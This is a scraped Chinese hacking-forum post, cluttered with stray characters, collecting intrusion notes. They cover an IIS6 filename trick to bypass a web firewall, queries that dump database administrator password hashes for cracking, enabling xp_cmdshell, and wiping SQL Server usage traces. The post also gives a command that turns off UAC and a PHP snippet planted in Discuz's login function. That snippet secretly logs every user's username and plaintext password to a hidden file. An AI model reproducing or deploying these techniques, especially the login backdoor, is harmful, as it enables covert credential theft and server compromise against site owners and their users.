) ~, W$ X# U/ ~; f) N3 i. v- Y其实修改wp-login.php不是个好办法。容易被发现,还有其他的方法的,做个记录! ~& t! U: }9 U. g) q6 x
利用II6文件解析漏洞绕过安全狗代码:" t, E3 V/ |& h
;antian365.asp;antian365.jpg
; d a) g+ n% g* `
& S2 Q; j0 V1 l* M, O/ ^+ I各种类型数据库抓HASH破解最高权限密码!- u8 B& s7 G9 r
1.sql server2000
6 U/ c1 q8 i; v1 {SELECT password from master.dbo.sysxlogins where name='sa'/ g7 u3 F1 g. O" z/ `, w
0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED250341
' |5 y; P+ S, p u9 u' a5 \# A, M2FD54D6119FFF04129A1D72E7C3194F7284A7F3A
+ E4 {' `: c0 {3 k, C4 f0 V9 l# H% P. t7 S0 Y4 t& d
0×0100- constant header
' D2 F( @' @4 p# l) p; y34767D5C- salt. T) w( X3 A( Y t4 ~9 W
0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash8 z9 |9 h3 ~9 {' l
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash7 l( Q" P6 a m) D1 C" [; w6 J+ T: q9 J
crack the upper case hash in ‘cain and abel’ and then work the case sentive hash
9 R* I) e; A' A" BSQL server 2005:-. D6 l0 C V& E; C4 S8 R0 M
SELECT password_hash FROM sys.sql_logins where name='sa'# W" g6 \1 r- T: k5 `% c, x
0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F
* F5 z4 M7 g5 i3 k& G2 L6 b0×0100- constant header
8 l0 G7 a+ ?- k: y* @* m993BF231-salt! }& \( v4 _0 ]
5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash) @' O3 m; K- R
crack case sensitive hash in cain, try brute force and dictionary based attacks.
/ g0 g& B6 ?3 U, X+ O: g8 e( P* m6 i# V2 ]- z- I
update:- following bernardo’s comments:-
# D' @( J/ D( d' {% Kuse function fn_varbintohexstr() to cast password in a hex string.
9 f$ B h" \( o( B" p- ?" Ue.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password)from sysxlogins1 T7 @! v4 \; o# J i
: ~# T. U, p" G! E9 d
MYSQL:-
+ n" Q$ z0 L: { p! o& n$ c' s/ V& |$ g! P
In MySQL you can generate hashes internally using the password(), md5(), or sha1 functions. password() is the function used for MySQL’s own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.
1 n% M) ^7 E; v& i5 R: O0 c% G* X1 \! Y7 x# a: ^: Y8 G' P2 G
*mysql < 4.16 I$ f' X3 g g9 x$ y8 }1 v Y# I; V1 p
8 K' W" _8 ?% W
mysql> SELECT PASSWORD(‘mypass’);
& b8 G+ v S) ]- S5 g+——————–+/ [0 _' L, g" Y$ E
| PASSWORD(‘mypass’) |5 a9 \) a+ @3 @6 N0 q, @* S
+——————–+2 H6 h u6 {# ]7 r6 o: ^7 F
| 6f8c114b58f2ce9e |
- r( }, z/ I; R" r2 d; I+——————–+
# }/ P4 [6 y! [$ V6 k- Y- n% I6 x# _6 N/ l) k
*mysql >=4.1
% d! G! w& `0 g, e4 n% f3 o& j' q; H% ]/ C) z" |+ Y
mysql> SELECT PASSWORD(‘mypass’);9 v. d$ ^; ^$ H6 [3 f5 _
+——————————————-+% l4 h3 c, X% @* [) y+ D1 N
| PASSWORD(‘mypass’) |4 Q7 O2 |2 J5 d* L" K: o% M0 i
+——————————————-+% s" J% ?, b0 k9 c) @% q3 s! |
| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |
: P# ~( U3 I( c+——————————————-+4 ?( D, W" X+ r7 k6 z
$ s" h% M ~) Z, {
Select user, password from mysql.user
1 \( e) P: r1 T) q+ q4 ?The hashes can be cracked in ‘cain and abel’ x3 k1 Z6 L% z, m; i! n4 r
/ z) G6 A3 s+ Z ]; `" K
Postgres:-7 X m8 N3 E, U. l; D+ p0 w, J
Postgres keeps MD5-based password hashes for database-level users in the pg_shadow table. You need to be the database superuser to read this table (usually called “postgres” or “pgsql”)
7 X! _$ |3 H, J |: V. w' K* yselect usename, passwd from pg_shadow;9 L8 Y$ a8 [% f. T8 ]% P
usename | passwd5 \0 F3 w& Z5 w( \
——————+————————————-! H( t6 c' @0 n1 M
testuser | md5fabb6d7172aadfda4753bf0507ed43963 V- W( h1 h( ~1 K0 M
use mdcrack to crack these hashes:-4 W* e( F! A) q% Y# k, I7 b% N
$ wine MDCrack-sse.exe –algorithm=MD5 –append=testuser fabb6d7172aadfda4753bf0507ed4396
5 t" p5 ^& K2 \) G0 Z
8 h, E$ o) k# ?2 i4 C" @1 rOracle:-
" K2 i2 x! w& b" L' ]' B: X8 Hselect name, password, spare4 from sys.user$+ Q. ?* Q4 Z- p
hashes could be cracked using ‘cain and abel’ or thc-orakelcrackert11g
" t8 C! Y) K& [7 n7 R* x. GMore on Oracle later, i am a bit bored….
3 i- c/ |9 S9 B4 {! w& x* H4 Z2 D$ s& @/ f9 _. F/ V3 H
: Z% ]$ C* i; Q/ E; m8 a) Q" [6 O在sql server2005/2008中开启xp_cmdshell
' g5 J. [( x. X-- To allow advanced options to be changed.
) W7 g' Z. c- U+ z# cEXEC sp_configure 'show advanced options', 1
" x7 {3 o Y3 w3 ?9 a# S L( _) JGO( i3 j! n w, q% v$ J( r* D
-- To update the currently configured value for advanced options.
( A+ Q+ }! v {# E3 sRECONFIGURE' u9 y7 h+ ?6 p, O4 Z3 @
GO+ q& V( \, Z8 c( G: P
-- To enable the feature.
. A% \# X4 v, ]. G; hEXEC sp_configure 'xp_cmdshell', 1
) P. B: [. G6 K8 F4 hGO# _# c- r' A% N' Z5 t0 V, U* [
-- To update the currently configured value for this feature.
* O$ ~8 ?* l8 C8 | ]RECONFIGURE. i* X( {0 j4 E! F' A& V
GO
& _: W, ]) }% tSQL 2008 server日志清除,在清楚前一定要备份。
2 f% T7 z j& Z, b' m如果Windows Server 2008 标准版安装SQL Express 2008,则在这里删除:
2 T9 O; l3 c' T( E, A- f, \2 iX:\Users[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin+ b" d& O) x2 Y/ ?! v; k
( U, B5 h4 }; |8 i7 k# ]
对于SQL Server 2008以前的版本:
1 Y, o, a, y7 Z* b3 ]1 Q1 `: iSQL Server 2005:
5 j$ H% L: u/ S1 y% ]3 u删除X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat
4 k7 `% y+ j2 y& j0 H8 ESQL Server 2000:5 p5 }" E, o8 S+ ^9 k: I& t& u4 y
清除注册表HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers\相应的内容即可。5 F6 ^ i" `1 L, ?% J
% T( n, |: h6 a4 {. s1 {本帖最后由 simeon 于 2013-1-3 09:51 编辑" q; u w( y' ~& `/ C8 B. o
' D6 P; [4 s( X% \
$ B/ n1 t$ }/ C- _. b9 }windows 2008 文件权限修改
. O" B2 C. Q+ i9 x$ E1.http://technet.microsoft.com/zh- ... 4%28v=ws.10%29.aspx% l- h( g5 }: C2 A, j
2.http://hi.baidu.com/xiaobei713/item/b0cfae38f6bd278df5e4ad98
" f" o; \" S; B) _* d一、先在右键菜单里面看看有没有“管理员取得所有权”,没有“管理员取得所有权”,! p8 K+ `7 `; ?
6 J4 a4 J/ l# P) M; g1 NWindows Registry Editor Version 5.00
4 h) U9 p2 x! u& S: Z[HKEY_CLASSES_ROOT\*\shell\runas]
}' L' f5 c8 Z- S@="管理员取得所有权"1 P+ z2 x! N2 F4 V( p0 o2 o
"NoWorkingDirectory"=""
* I9 l8 P+ o2 ?. D[HKEY_CLASSES_ROOT\*\shell\runas\command]
$ H2 C& N- Y m@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
& a' Q6 T1 f7 L @* [; ^" z n/ N, t+ r"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"$ y" e+ T& p3 b
[HKEY_CLASSES_ROOT\exefile\shell\runas2]' p8 B5 r' A6 B) x
@="管理员取得所有权") E2 O# b% j/ P1 \, I' n s2 O
"NoWorkingDirectory"=""
( G2 C2 _3 I% E3 D8 V" S* ` d2 J[HKEY_CLASSES_ROOT\exefile\shell\runas2\command]
) p: o3 {8 U. F2 q$ A* _@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
- x$ m3 [4 b7 J) Q U/ y% ?+ [" e"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
# O* I7 m1 h% R: g$ ^5 K2 D: ]2 [8 @' |' m1 Q3 l
[HKEY_CLASSES_ROOT\Directory\shell\runas]1 h$ L% b6 H) g, h. y0 l* U* T
@="管理员取得所有权"
4 K, z4 _5 f& b6 n1 M: F"NoWorkingDirectory"=""
, [! v% e* ]( j) R[HKEY_CLASSES_ROOT\Directory\shell\runas\command]
4 p( v1 L( f" Z$ r: G@="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
- B9 y4 Q/ T" c4 n"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"; M" h9 d: v+ p
: ^; m: ]' T6 I: c+ Q+ Z& f, h
" |( U! c6 G8 J- Y/ Kwin7右键“管理员取得所有权”.reg导入& z0 k, U% N# D$ h' f
二、在C:\Windows目录里下搜索“notepad.exe”文件,应该会搜索到四个“notepad.exe”和四个“notepad.exe.mui”,. L+ }# I5 }1 y t8 [9 ~
1、C:\Windows这个路径的“notepad.exe”不需要替换* B& P* ?6 c2 S. O* [" C8 m$ _
2、C:\Windows\System32这个路径的“notepad.exe”不需要替换9 u, H& ]5 \) |% E9 K
3、四个“notepad.exe.mui”不要管, _! ^9 S7 H5 S% \
4、主要替换C:\Windows\winsxs\x86_microsoft-windows-notepad_31bf3856ad364e35_6.1.7600.16385_none_6ef0e39ed15350e4和
# s8 t$ u5 ]/ c |. h! m7 mC:\Windows\winsxs\x86_microsoft-windows-notepadwin_31bf3856ad364e35_6.1.7600.16385_none_42a023025c60a33a两个文件下的“notepad.exe”
$ o& X0 e! u$ W" z替换方法先取得这两个文件夹的管理员权限,然后把“Notepad2.exe”重命名为“notepad.exe”替换到这两个文件夹下面,) g# V5 T1 X& [) J' j, u9 i
替换完之后回到桌面,新建一个txt文档打开看看是不是变了。; H5 p$ p0 F3 l. M1 p9 T9 S
windows 2008中关闭安全策略:
- k4 H* `3 h# Ereg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
# I' H# M, G/ d$ _& p, I修改uc_client目录下的client.php 在
0 @: M& i+ C/ Y1 u sfunction uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {
4 m4 }& O& ^% x/ e1 A, u7 M4 v3 V下加入如上代码,在网站./data/cache/目录下自动生成csslog.php
, n1 x$ @4 _3 T, N% W: G# K7 G* Z你可以在ipdata目录下添加 view.php 可以用来查看记录的,密码为:falw$ u1 ?# q, W+ `" \6 [9 x8 V. _6 Z
if(getenv('HTTP_CLIENT_IP')) {. u/ k1 o& s0 W
$onlineip = getenv('HTTP_CLIENT_IP');
$ t. g: {$ u7 ^0 t} elseif(getenv('HTTP_X_FORWARDED_FOR')) {
: {$ A4 P% _! Z. x3 W$onlineip = getenv('HTTP_X_FORWARDED_FOR');% z" H/ Y9 Y; ]4 G) X
} elseif(getenv('REMOTE_ADDR')) {
2 ?: q5 C% q0 g/ ]% D4 f$onlineip = getenv('REMOTE_ADDR');! B1 @1 U5 |# Y$ w3 n
} else {# N) X1 s9 p! h+ N, S
$onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];
, S8 v2 A6 M. d2 R}
5 y5 f8 W9 X; U+ d& I+ v $showtime=date("Y-m-d H:i:s");
' J% s0 `) { P% w5 n: _' F, K# ^ $record="<?exit();?>用户:".$username." 密码:".$password." IP:".$onlineip." Time:".$showtime."\r\n"; P2 y) r# N9 V5 C
$handle=fopen('./data/cache/csslog.php','a+');
) \( ~2 m+ ]4 M $write=fwrite($handle,$record); |
发表于 2013-2-27 21:24:42
收藏
支持
反对